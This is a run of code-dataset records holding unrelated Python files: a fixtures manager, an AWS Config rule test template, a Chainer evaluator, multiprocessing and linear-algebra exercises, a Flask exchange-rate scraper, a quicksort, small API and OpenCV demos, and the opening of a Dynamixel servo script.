versionadded:: 0.3.0\n        ``db_session`` argument was added.\n\n    \"\"\"\n\n    def __init__(self, db_session=None, use_unicode=False):\n        self.hooks = {}\n        self.session = db_session\n        self.installed_keys = []\n        self.use_unicode = use_unicode\n\n    def load(self, filenames, models_package=\"\"):\n        \"\"\"Pre-load the fixtures.\n\n        :param list_or_str filenames: file or list of files that holds the\n            fixture data\n        :param str models_package: package holding the models definition\n\n        Note that this does not effectively instantiate anything. It just does\n        some pre-instantiation work, like prepending the root model package\n        and doing some basic sanity check.\n\n        .. versionchanged:: 0.3.0\n            ``db_session`` argument was removed and put in the object's\n            constructor arguments.\n\n        .. versionchanged:: 0.3.7\n            ``filename`` argument was changed to ``filenames``, which can be\n            list or string.\n\n        \"\"\"\n\n        self.filenames = filenames\n        self.models_package = models_package\n\n        # Load the data\n        fixtures, self.depgraph = self._load_fixtures(self.filenames)\n        self.fixture_collection = DictFixtureCollection(\n            ROOT_COLLECTION,\n            fixture_manager=self,\n            fixtures=fixtures)\n\n        # Initiate the cache\n        self.clean_cache()\n\n    def _get_namespace_from_filename(self, filename):\n        \"\"\"Get a collection namespace from a fixtures filename.\n\n        :param str filename: filename to extract namespace from\n        \"\"\"\n\n        segments = os.path.basename(filename).split(\".\")\n        if len(segments) > 2:\n            raise ValueError(\"Fixtures filename stem may not contain periods\")\n\n        return segments[0]\n\n    def _load_fixtures(self, filenames):\n        \"\"\"Pre-load the fixtures.\n\n        :param list or str filenames: files that hold the fixture data\n        \"\"\"\n\n        if isinstance(filenames, _compat.string_types):\n            globbed_filenames = glob(filenames)\n        else:\n            globbed_filenames = list(\n                chain.from_iterable(glob(f) for f in filenames)\n            )\n\n        if len(globbed_filenames) == 1:\n            # a single match: load it directly rather than the raw pattern\n            content = load_file(globbed_filenames[0], self.use_unicode)\n        else:\n            content = {}\n\n            for filename in globbed_filenames:\n                namespace = self._get_namespace_from_filename(filename)\n                content[namespace] = {\n                    \"objects\": load_file(filename, self.use_unicode)\n                }\n\n        fixtures = {}\n        for k, v in _compat.iteritems(content):\n\n            if \"objects\" in v:\n                # It's a collection of fixtures.\n                fixtures[k] = self._handle_collection(\n                    namespace=k,\n                    definition=v,\n                    objects=v[\"objects\"],\n                )\n\n            # Named fixtures\n            else:\n                if \"id\" in v:\n                    # Renaming id because it's a Python builtin function\n                    v[\"id_\"] = v[\"id\"]\n                    del v[\"id\"]\n\n                fixtures[k] = Fixture(key=k, fixture_manager=self, **v)\n\n        d = DepGraph()\n        for fixture in fixtures.values():\n            for dependency, _ in fixture.extract_relationships():\n                d.add_edge(dependency, fixture.key)\n\n        # This does nothing except raise an error if there's a cycle\n        d.topo_sort()\n        return fixtures, d\n\n    def _handle_collection(self, namespace, definition, objects):\n        \"\"\"Handle a collection of fixtures.\n\n        :param dict definition: definition of the collection\n        :param dict_or_list objects: fixtures in the collection\n\n        \"\"\"\n\n        if isinstance(objects, list):\n            klass = ListFixtureCollection\n        else:\n            klass = DictFixtureCollection\n\n        collection = klass(\n            key=namespace,\n            fixture_manager=self,\n            model=definition.get('model'),\n            fields=definition.get('fields'),\n            post_creation=definition.get('post_creation'),\n            inherit_from=definition.get('inherit_from'),\n            depend_on=definition.get('depend_on'),\n        )\n\n        for name, new_fields in collection.iterator(objects):\n            qualified_name = 
\"%s.%s\" % (namespace, name)\n\n if \"objects\" in new_fields:\n # A nested collection, either because we're dealing with a file\n # collection or a sub-collection.\n fixture = self._handle_collection(\n namespace=qualified_name,\n definition=new_fields,\n objects=new_fields[\"objects\"]\n )\n else:\n model = new_fields.pop(\"model\", None)\n # In the case of a file collection we'll be dealing with\n # PyYAML's output from that file, which means that individual\n # fixtures in this collection have the \"fields\" field.\n fields = new_fields.pop(\"fields\", new_fields)\n inherit_from = namespace if model is None else None\n\n fixture = Fixture(\n key=qualified_name,\n fixture_manager=self,\n # Automatically inherit from the collection\n inherit_from=inherit_from,\n fields=fields,\n model=model\n # The rest (default fields, etc.) is\n # automatically inherited from the collection.\n )\n collection.add(name, fixture)\n\n return collection\n\n def clean_cache(self):\n \"\"\"Clean the cache.\"\"\"\n self.cache = {}\n self.installed_keys = []\n\n def save_instance(self, instance):\n \"\"\"Save a fixture instance.\n\n If it's a SQLAlchemy model, it will be added to the session and\n the session will be committed.\n\n Otherwise, a :meth:`save` method will be run if the instance has\n one. If it does not have one, nothing will happen.\n\n Before and after the process, the :func:`before_save` and\n :func:`after_save` hook are run.\n\n \"\"\"\n\n self._get_hook(\"before_save\")(instance)\n\n if self.session and is_sqlalchemy_model(instance):\n self.session.add(instance)\n self.session.commit()\n\n else:\n getattr(instance, \"save\", lambda: None)()\n\n self._get_hook(\"after_save\")(instance)\n\n def delete_instance(self, instance):\n \"\"\"Delete a fixture instance.\n\n If it's a SQLAlchemy model, it will be deleted from the session and the\n session will be committed.\n\n Otherwise, :meth:`delete_instance` will be run first. If the instance\n does not have it, :meth:`delete` will be run. If the instance does not\n have it, nothing will happen.\n\n Before and after the process, the :func:`before_delete` and\n :func:`after_delete` hook are run.\n\n \"\"\"\n\n self._get_hook(\"before_delete\")(instance)\n\n if self.session and is_sqlalchemy_model(instance):\n self.session.delete(instance)\n self.session.commit()\n\n else:\n try:\n getattr(instance, \"delete_instance\")()\n except AttributeError:\n getattr(instance, \"delete\", lambda: None)()\n\n self._get_hook(\"after_delete\")(instance)\n\n def install_fixture(self, fixture_key, do_not_save=False, attrs=None):\n\n \"\"\"Install a fixture.\n\n :param str fixture_key:\n :param bool do_not_save: True if fixture should not be saved.\n :param dict attrs: override fields\n\n :rtype: :data:`fixture_instance`\n\n .. 
versionremoved:: 0.3.7\n            ``include_relationships`` argument was removed.\n\n        \"\"\"\n\n        try:\n            self._get_hook(\"before_install\")()\n            instance = self.get_fixture(fixture_key, attrs=attrs)\n\n            # Save the instance\n            if not do_not_save:\n                if hasattr(instance, '__iter__'):\n                    # Save all the instances!\n                    for model in instance:\n                        self.save_instance(model)\n                else:\n                    self.save_instance(instance)\n\n        except Exception as exc:\n            self._get_hook(\"after_install\")(exc)\n            raise\n\n        else:\n            self._get_hook(\"after_install\")(None)\n            return instance\n\n    def install_fixtures(self, fixture_keys, do_not_save=False):\n        \"\"\"Install a list of fixtures.\n\n        :param fixture_keys: fixtures to be installed\n        :type fixture_keys: str or list of strs\n        :param bool do_not_save: True if fixture should not be saved.\n\n        :rtype: list of :data:`fixture_instance`\n\n        .. versionremoved:: 0.3.7\n            ``include_relationships`` argument was removed.\n\n        \"\"\"\n        instances = []\n        for f in make_list(fixture_keys):\n            instances.append(self.install_fixture(f, do_not_save=do_not_save))\n\n        return instances\n\n    def install_all_fixtures(self, do_not_save=False):\n        \"\"\"Install all fixtures.\n\n        :param bool do_not_save: True if fixture should not be saved.\n\n        :rtype: list of :data:`fixture_instance`\n\n        .. versionremoved:: 0.3.7\n            ``include_relationships`` argument was removed.\n\n        \"\"\"\n\n        return self.install_fixtures(self.keys(), do_not_save=do_not_save)\n\n    def uninstall_fixture(self, fixture_key, do_not_delete=False):\n        \"\"\"Uninstall a fixture.\n\n        :param str fixture_key:\n        :param bool do_not_delete: True if fixture should not be deleted.\n\n        :rtype: :data:`fixture_instance` or None if no instance was uninstalled\n            with the given key\n        \"\"\"\n\n        try:\n            self._get_hook(\"before_uninstall\")()\n            instance = self.cache.get(fixture_key)\n            if instance:\n                self.cache.pop(fixture_key, None)\n                self.installed_keys.remove(fixture_key)\n\n                # delete the instance\n                if not do_not_delete:\n                    self.delete_instance(instance)\n\n        except Exception as exc:\n            self._get_hook(\"after_uninstall\")(exc)\n            raise\n\n        else:\n            self._get_hook(\"after_uninstall\")(None)\n            return instance\n\n    def uninstall_fixtures(self, fixture_keys, do_not_delete=False):\n        \"\"\"Uninstall a list of installed fixtures.\n\n        If a given fixture was not previously installed, nothing happens and\n        its instance is not part of the returned list.\n\n        :param fixture_keys: fixtures to be uninstalled\n        :type fixture_keys: str or list of strs\n        :param bool do_not_delete: True if fixture should not be deleted.\n\n        :rtype: list of :data:`fixture_instance`\n        \"\"\"\n        instances = []\n        for fixture_key in make_list(fixture_keys):\n            instance = self.uninstall_fixture(fixture_key, do_not_delete)\n            if instance:\n                instances.append(instance)\n\n        return instances\n\n    def uninstall_all_fixtures(self, do_not_delete=False):\n        \"\"\"Uninstall all installed fixtures.\n\n        :param bool do_not_delete: True if fixture should not be deleted.\n\n        :rtype: list of :data:`fixture_instance`\n        \"\"\"\n        installed_fixtures = list(self.installed_keys)\n        installed_fixtures.reverse()\n        return self.uninstall_fixtures(installed_fixtures, do_not_delete)\n\n    def keys(self):\n        \"\"\"Return all fixture keys.\"\"\"\n        return self.fixture_collection.fixtures.keys()\n\n    def get_fixture(self, fixture_key, attrs=None):\n        \"\"\"Return a fixture instance (but do not save it).\n\n        :param str fixture_key:\n        :param dict attrs: override fields\n\n        :rtype: instantiated but unsaved fixture\n\n        .. 
versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n # initialize all parents in topological order\n parents = []\n for fixture in self.depgraph.ancestors_of(fixture_key):\n parents.append(self.get_fixture(fixture))\n\n # Fixture are cached so that setting up relationships is not too\n # expensive. We don't get the cached version if attrs are\n # overriden.\n returned = None\n\n if not attrs:\n returned = self.cache.get(fixture_key)\n\n if not returned:\n returned = self.fixture_collection.get_instance(\n fixture_key, fields=attrs,\n )\n\n self.cache[fixture_key] = returned\n self.installed_keys.append(fixture_key)\n\n return returned\n\n def get_fixtures(self, fixture_keys):\n \"\"\"Return a list of fixtures instances.\n\n :param iterable fixture_keys:\n\n :rtype: list of instantiated but unsaved fixtures\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n fixtures = []\n for f in fixture_keys:\n fixtures.append(self.get_fixture(f))\n return fixtures\n\n def _get_hook(self, hook_name):\n \"\"\"Return a hook.\"\"\"\n\n if hook_name in self.hooks:\n return self.hooks[hook_name]\n\n return lambda *args: None\n\n def set_hook(self, hookname, func):\n \"\"\"Add a hook.\n\n :param str hookname:\n :param function func:\n \"\"\"\n\n if hookname not in ALLOWED_HOOKS:\n raise KeyError(\"'%s' is not an allowed hook.\" % hookname)\n\n self.hooks[hookname] = func\n","sub_path":"charlatan/fixtures_manager.py","file_name":"fixtures_manager.py","file_ext":"py","file_size_in_byte":14751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"484560527","text":"import datetime\nimport json\nimport logging\nimport unittest\nfrom unittest.mock import patch, MagicMock\nfrom botocore.exceptions import ClientError\nfrom rdklib import Evaluation, ComplianceType\nimport rdklibtest\n\n##############\n# Parameters #\n##############\n\n# Define the default resource to report to Config Rules\n# TODO - Replace with your resource type\nRESOURCE_TYPE = \"AWS::IAM::Role\"\n\n#############\n# Main Code #\n#############\n\nMODULE = __import__(\"check_security_hub_aggregator\")\nRULE = MODULE.check_security_hub_aggregator()\n\nCLIENT_FACTORY = MagicMock()\n\n# example for mocking IAM API calls\nIAM_CLIENT_MOCK = MagicMock()\n# STS client for getting account ID\nSTS_CLIENT_MOCK = MagicMock()\n\n\ndef mock_get_client(client_name, *args, **kwargs):\n if client_name == \"iam\":\n return IAM_CLIENT_MOCK\n if client_name == \"sts\":\n return STS_CLIENT_MOCK\n raise Exception(\"Attempting to create an unknown client\")\n\n\n@patch.object(CLIENT_FACTORY, \"build_client\", MagicMock(side_effect=mock_get_client))\nclass ComplianceTest(unittest.TestCase):\n rule_parameters = {\n \"SomeParameterKey\": \"SomeParameterValue\",\n \"SomeParameterKey2\": \"SomeParameterValue2\",\n }\n\n role_sample_configuration_abridged = {\"arn\": \"some-arn\", \"roleName\": \"testrole\"}\n\n invoking_event_iam_role_sample = {\n \"configurationItem\": {\n \"relatedEvents\": [],\n \"relationships\": [],\n \"configuration\": role_sample_configuration_abridged,\n \"tags\": {},\n \"configurationItemCaptureTime\": \"2018-07-02T03:37:52.418Z\",\n \"awsAccountId\": \"123456789012\",\n \"configurationItemStatus\": \"ResourceDiscovered\",\n \"resourceType\": \"AWS::IAM::Role\",\n \"resourceId\": \"some-resource-id\",\n \"resourceName\": \"some-resource-name\",\n \"ARN\": \"some-arn\",\n },\n \"notificationCreationTime\": 
\"2018-07-02T23:05:34.445Z\",\n \"messageType\": \"ConfigurationItemChangeNotification\",\n \"executionRoleArn\": \"arn:aws:dummy\",\n }\n\n list_roles_response = {\n \"Roles\": [\n {\n \"Path\": \"/\",\n \"RoleName\": \"testrole\",\n \"RoleId\": \"some-role-id\",\n \"Arn\": \"arn:aws:iam::111111111111:role/testrole\",\n \"CreateDate\": datetime.datetime(2015, 1, 1),\n \"Description\": \"this is a test role\",\n \"MaxSessionDuration\": 123,\n \"Tags\": [\n {\"Key\": \"one_tag\", \"Value\": \"its_value\"},\n ],\n \"RoleLastUsed\": {\n \"LastUsedDate\": datetime.datetime(2015, 1, 1),\n \"Region\": \"us-east-1\",\n },\n },\n ]\n }\n test_account_id = \"111111111111\"\n get_caller_identity_response = {\"Account\": test_account_id}\n\n def setUp(self):\n STS_CLIENT_MOCK.reset_mock()\n\n def test_sample(self):\n self.assertTrue(True)\n\n # Example of how to evaluate a configuration change rule\n def test_configurationchange_rule(self):\n # Mock any usage of get_caller_identity\n STS_CLIENT_MOCK.get_caller_identity = MagicMock(\n return_value=self.get_caller_identity_response\n )\n response = RULE.evaluate_change(\n event=json.dumps(self.invoking_event_iam_role_sample),\n client_factory=CLIENT_FACTORY,\n configuration_item=self.role_sample_configuration_abridged,\n valid_rule_parameters=json.dumps(self.rule_parameters),\n )\n resp_expected = []\n resp_expected.append(\n Evaluation(\n complianceType=ComplianceType.NOT_APPLICABLE,\n annotation=\"This is a configuration change rule's annotation.\",\n resourceId=self.invoking_event_iam_role_sample.get(\n \"configurationItem\", {}\n ).get(\"resourceId\", None),\n resourceType=RESOURCE_TYPE,\n )\n )\n if vars(response[0]) != vars(resp_expected[0]):\n logging.warning(f\"Actual response: {vars(response[0])}\")\n logging.warning(f\"Expected response: {vars(resp_expected[0])}\")\n rdklibtest.assert_successful_evaluation(self, response, resp_expected)\n\n # Example of how to mock the client response for a list_roles API call\n def test_periodic_rule(self):\n # Mock any usage of get_caller_identity\n STS_CLIENT_MOCK.get_caller_identity = MagicMock(\n return_value=self.get_caller_identity_response\n )\n IAM_CLIENT_MOCK.list_roles = MagicMock(return_value=self.list_roles_response)\n # Example of how to evaluate a periodic rule\n response = RULE.evaluate_periodic(\n event=rdklibtest.create_test_scheduled_event(self.rule_parameters),\n client_factory=CLIENT_FACTORY,\n valid_rule_parameters=json.dumps(self.rule_parameters),\n )\n resp_expected = []\n resp_expected.append(\n Evaluation(\n complianceType=ComplianceType.NOT_APPLICABLE,\n resourceId=self.invoking_event_iam_role_sample.get(\n \"configurationItem\", {}\n ).get(\"awsAccountId\", None),\n resourceType=\"AWS::::Account\",\n annotation=\"This is a periodic rule's annotation.\",\n )\n )\n if vars(response[0]) != vars(resp_expected[0]):\n logging.warning(f\"Actual response: {vars(response[0])}\")\n logging.warning(f\"Expected response: {vars(resp_expected[0])}\")\n rdklibtest.assert_successful_evaluation(self, response, resp_expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"rdk/template/runtime/python3.7-lib/rule_test.py","file_name":"rule_test.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"265862579","text":"import chainer\r\nimport chainer.functions as F\r\nfrom chainer.backends import cuda\r\nfrom chainer.training import extensions\r\nfrom chainer import reporter as 
reporter_module\r\nfrom chainer import function\r\nimport copy  # needed for copy.copy(iterator) below\r\nimport numpy as np\r\n\r\n\r\nclass Evaluator(extensions.Evaluator):\r\n    def evaluate(self):\r\n        iterator = self._iterators['main']\r\n        eval_func = self.eval_func or self._targets['main']\r\n        if self.eval_hook:\r\n            self.eval_hook(self)\r\n\r\n        if hasattr(iterator, 'reset'):\r\n            iterator.reset()\r\n            it = iterator\r\n        else:\r\n            it = copy.copy(iterator)\r\n\r\n        summary = reporter_module.DictSummary()\r\n\r\n        while True:\r\n            batch = it.next()\r\n            observation = {}\r\n            with reporter_module.report_scope(observation):\r\n                in_arrays = self.converter(batch, self.device)\r\n                with function.no_backprop_mode():\r\n                    if isinstance(in_arrays, tuple):\r\n                        eval_func(*in_arrays)\r\n                    elif isinstance(in_arrays, dict):\r\n                        eval_func(**in_arrays)\r\n                    else:\r\n                        eval_func(in_arrays)\r\n\r\n            summary.add(observation)\r\n            if it.is_new_epoch:\r\n                break\r\n        out = summary.compute_mean()\r\n        print('#############################################', out)\r\n        return out\r\n","sub_path":"neural_network/Modified_module/Modified_Evaluater.py","file_name":"Modified_Evaluater.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"174432774","text":"# Author: ninuxer\n# Date: 2018/05/14 11:07\n# File: 多进程之创建方式.py\n\n\n\"\"\"\nThe multiprocessing module has essentially the same interface as the threading module\nMethods such as join() and setDaemon() work the same way\n\"\"\"\n\n# # Way 1 to create a process:\n# import multiprocessing\n# import os\n#\n#\n# def func(n):\n#     print('{} is run now,my PID is {}, parent_pid is {}'.format(n, os.getpid(), os.getppid()))\n#\n#\n# if __name__ == '__main__':  # On Windows the main-process code must go under main, otherwise an error is raised\n#     p_list = []\n#\n#     for i in range(5):\n#         p = multiprocessing.Process(target=func, args=(i,))\n#         p.start()\n#         p_list.append(p)\n#\n#     # Because of join, this print in the main process runs only after all child processes finish\n#     for j in p_list:\n#         j.join()\n#     print('I am main process,my pid is {}'.format(os.getpid()))\n\n\n# Way 2 to create a process\n\nimport multiprocessing\nimport os\n\n\nclass MyProcess(multiprocessing.Process):\n    def __init__(self, n):\n        super(MyProcess, self).__init__()\n        self.name = n\n\n    def run(self):\n        print('{} is run now,my PID is {}, parent_pid is {}'.format(self.name, os.getpid(), os.getppid()))\n\n\nif __name__ == '__main__':\n\n    for i in range(5):\n        name = 'nwc'+str(i)\n        p = MyProcess(name)\n        p.start()\n\n    print('I am main process,my pid is {}'.format(os.getpid()))\n\n","sub_path":"2018-05-14/多进程之创建方式.py","file_name":"多进程之创建方式.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"127951470","text":"# This file adds functions to check for Parallelism and Orthogonality\n\nfrom math import sqrt, acos, pi\nfrom decimal import Decimal, getcontext\ngetcontext().prec = 30\n\n# using Decimal package, which gives us better numerical precision\n\ngetcontext().prec = 30\n\nclass Vector(object):\n    def __init__(self, coordinates):\n        try:\n            if not coordinates:\n                raise ValueError\n            self.coordinates = tuple( [Decimal(x) for x in coordinates] )\n            self.dimension = len(self.coordinates)\n\n        except ValueError:\n            raise ValueError('The coordinates must be nonempty')\n        except TypeError:\n            raise TypeError('The coordinates must be an iterable')\n\n    def __str__(self):\n        return 'Vector: {}'.format(self.coordinates)\n\n    def __eq__(self, v):\n        return self.coordinates == v.coordinates\n\n    def plus(self, v):\n        new_coordinates = [x+y for x,y in zip(self.coordinates, v.coordinates)]\n        return Vector(new_coordinates)\n\n    def minus(self, 
v):\n        new_coordinates = [x-y for x,y in zip(self.coordinates, v.coordinates)]\n        return Vector(new_coordinates)\n\n    def times_scalar(self, c):\n        new_coordinates = [Decimal(c)*x for x in self.coordinates]\n        return Vector(new_coordinates)\n\n    def magnitude(self):\n        coordinates_squared = [x**2 for x in self.coordinates] # x^2\n        return Decimal.sqrt(sum(coordinates_squared)) # DECIMAL !!!\n\n    def normalized(self):\n        try:\n            magnitude = self.magnitude()\n            return self.times_scalar(Decimal('1.0')/magnitude) # U = V/||V||\n        except ZeroDivisionError: # if self=0\n            raise Exception('Cannot normalize the zero vector')\n\n    def dot(self, v):\n        return sum([x*y for x,y in zip(self.coordinates, v.coordinates)])\n\n    def angle_with(self, v, in_degrees=False):\n        try:\n            u1 = self.normalized()\n            u2 = v.normalized()\n            angle_in_radians = acos(u1.dot(u2)) # =arccos() # from math module\n            if in_degrees:\n                degrees_per_radian = 180. / pi # pi is also from math module\n                return angle_in_radians * degrees_per_radian\n            else:\n                return angle_in_radians\n        except Exception as e: # if self=0\n            if str(e) == 'Cannot normalize the zero vector' :\n                raise Exception('Cannot compute an angle with the zero vector')\n            else:\n                raise e\n\n\n    # Function checking for Orthogonality\n    def is_orthogonal_to(self, v, tolerance=1e-10):\n        return abs(self.dot(v)) < tolerance # return Boolean True/False\n\n\n    # Function checking for Parallelism\n    def is_zero(self, tolerance=1e-10):\n        return self.magnitude() < tolerance # return Boolean True/False\n\n    def is_parallel_to(self, v): # return Boolean True/False\n        return ( self.is_zero() or v.is_zero() or\n            # if any one is 0, they're parallel\n                 self.angle_with(v) == 0 or # pointing same direction\n                 self.angle_with(v) == pi ) # pointing opposite directions\n\n\n########################### Test Function ##########################\nprint ('first pair ...')\nv = Vector(['-7.579','-7.88'])\nw = Vector(['22.737','23.64'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('second pair ...')\nv = Vector(['-2.029','9.97', '4.172'])\nw = Vector(['-9.231','-6.639', '-7.245'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('third pair ...')\nv = Vector(['-2.328','-7.284', '-1.214'])\nw = Vector(['-1.821','1.072', '-2.94'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('fourth pair ...')\nv = Vector(['2.118','4.827'])\nw = Vector(['0','0'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n","sub_path":"L0_Programming_Linear_Algebra_and_Differential_Equations/Linear Algebra/1.5_add_parallel_and_orthogonal.py","file_name":"1.5_add_parallel_and_orthogonal.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"482438893","text":"from flask import Flask, render_template\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nimport base64\nfrom bs4 import BeautifulSoup \nimport requests\n\n#don't change this\nmatplotlib.use('Agg')\napp = Flask(__name__) #do not change this\n\n#insert the scraping here\nurl_get = requests.get('https://www.exchange-rates.org/history/IDR/USD/T')\nsoup = BeautifulSoup(url_get.content,\"html.parser\")\n\n#find your right key here\ntable = soup.find('div', attrs={'class':'table-responsive'})\nrow = table.find_all('tr', attrs={'td':''})\n\nrow_length 
= len(row)\n\ntemp = [] #initiating a list \n\nfor i in range(1, row_length):\n#insert the scraping process here\n    \n    data = table.find_all('tr', attrs={'td':''})[i].text\n    \n    temp.append((data)) \n\ntemp = temp[::-1]\n\n#change into dataframe\ndf = pd.DataFrame(temp, columns = ['data'])\n    \n#insert data wrangling here\ndf[['a','b','c','d','e','f']]= df.data.str.split(expand=True)\ndf1 = df.drop(['data','b','c','d','e'], axis = 1)\ndf1['exchange_rates'] = df1['a'].str[-12:]\ndf2 = df1.drop(['a'], axis=1)\ndf2['date'] = df2['f'].astype('datetime64')\ndf3 = df2.drop(['f'], axis = 1)\ndf3['exchange_rates_clean'] = df3['exchange_rates'].str.replace(',', '')\ndf4 = df3.drop(['exchange_rates'], axis=1)\ndf4['exchange_rates_clean'] = df4['exchange_rates_clean'].astype('float64').round()\ndf4 = df4.set_index(['date'])\ndf4['exchange_rates'] = df4['exchange_rates_clean']\ndf4 = df4.drop(['exchange_rates_clean'], axis=1)\n#end of data wrangling \n\n@app.route(\"/\")\ndef index(): \n\t\n\tcard_data = f'{df4[\"exchange_rates\"].mean().round(2)}' #be careful with the \" and ' \n\n\t# generate plot\n\tax = df4.plot(figsize = (20,9)) \n\t\n\t# Rendering plot\n\t# Do not change this\n\tfigfile = BytesIO()\n\tplt.savefig(figfile, format='png', transparent=True)\n\tfigfile.seek(0)\n\tfigdata_png = base64.b64encode(figfile.getvalue())\n\tplot_result = str(figdata_png)[2:-1]\n\n\t# render to html\n\treturn render_template('index.html',\n\t\tcard_data = card_data, \n\t\tplot_result=plot_result\n\t\t)\n\n\nif __name__ == \"__main__\": \n    app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"115640429","text":"# coding:utf-8\nfrom Base import *\n\n# All custom functions are written inside the class\n# 37ms small 1303B 7770744\n\n\nclass Answer(Base):\n    def solve(self, items):\n        return self.quickSort(items)\n\n    def median(self, a, start, end):\n        center = int((start + end) / 2)\n        if self.compare(a[center].id, a[start].id):\n            a[start], a[center] = a[center], a[start]\n        if self.compare(a[end].id, a[start].id):\n            a[start], a[end] = a[end], a[start]\n        if self.compare(a[end].id, a[center].id):\n            a[center], a[end] = a[end], a[center]\n        a[start], a[center] = a[center], a[start]\n\n    def doSwap(self, a, start, end):\n        if start >= end:\n            return\n        i, j = start, end\n        self.median(a, start, end)\n        tmp = a[start]\n        while(True):\n            while(self.compare(tmp.id, a[j].id) and i < j):\n                j -= 1\n            if i < j:\n                a[i] = a[j]\n                i += 1\n            while(self.compare(a[i].id, tmp.id) and i < j):\n                i += 1\n            if i < j:\n                a[j] = a[i]\n                j -= 1\n            else:\n                break\n        a[i] = tmp\n        self.doSwap(a, start, i - 1)\n        self.doSwap(a, j + 1, end)\n\n    def quickSort(self, a):\n        self.doSwap(a, 0, len(a) - 1)\n        return a\n\n\nif __name__ == '__main__':\n    data = [3, 6, 7, 9, 1, 2, 4, 0, 8, 5, 16]\n    testData = []\n    result = []\n    for i in data:\n        newItem = Item(i, 1)\n        testData.append(newItem)\n    a = Answer()\n    for i in range(0, len(data)):\n        result.append(a.solve(testData)[i].id)\n    print(result)\n","sub_path":"qlcode/contests_2/77quickSort.py","file_name":"77quickSort.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"187398633","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\na = [0] + list(map(int,input().split()))\nd = [0]*(n+1)\n\nfor i in range(1,n+1):\n    d[i] = d[i-1] + a[i]\nTotal = d[n]\nif Total % 3 != 0:\n    print(0)\n    exit(0)\n\ntarget_num 
= Total//3\ninner_cnt = 0\nans = 0\nif d[1] == target_num : inner_cnt = 1\nfor i in range(2,n):\n if d[i]==target_num*2: ans +=inner_cnt\n if d[i]==target_num: inner_cnt+=1\nprint(ans)","sub_path":"CodeForce/Number of Ways.py","file_name":"Number of Ways.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336802174","text":"import urllib.request\nimport os\nimport ssl\nimport json\n\ngcloud_api_key=os.environ[\"GCLOUD_KEY\"]\ncontext = ssl._create_unverified_context()\ngoogle_api_root=\"https://maps.googleapis.com/maps/api/\"\n\ndef get_distance_matrix(origin, destination, units=\"metric\", languages=\"en\"):\n params = [\n (\"units\",units),\n (\"origins\", origin),\n (\"destinations\", destination),\n (\"key\", gcloud_api_key),\n (\"language\", languages)\n ]\n url = google_api_root + \"distancematrix/json?\" + urllib.parse.urlencode(params)\n contents = urllib.request.urlopen(url, context=context).read()\n data = json.loads(contents.decode('utf-8'))\n return data\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295839873","text":"from CartPole import CartPole\n\ndef test():\n cartPole = CartPole(1., 2., 3., 4.)\n value = cartPole.dynamics(1., 2., 3., 4., 5.)\n print(value)\n\n state = cartPole.step()\n print(state)\n\nif __name__ == '__main__':\n test()","sub_path":"CartPole/CartPoleTest.py","file_name":"CartPoleTest.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384079166","text":"import cv2\nimport numpy as np\n\nimage=cv2.imread('images/pyramid.jpg')\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\nsift=cv2.xfeatures2d.SIFT_create()\nkeypoints=sift.detect(gray,None)\n\nprint('no of keypoints detected : '+str(len(keypoints)))\nimage=cv2.drawKeypoints(image,keypoints,None,flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv2.imshow('feature method - SIFT',image)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n","sub_path":"files/28_SIFT.py","file_name":"28_SIFT.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475955277","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n################################################################################\n# Copyright 2017 ROBOTIS CO., LTD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\nimport os\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nprint (\"My os name is \" + os.name)\n# Control table address\nADDR_MX_TORQUE_ENABLE = 24 # Control table address is different in Dynamixel model\nADDR_MX_GOAL_POSITION = 30\nADDR_MX_PRESENT_POSITION = 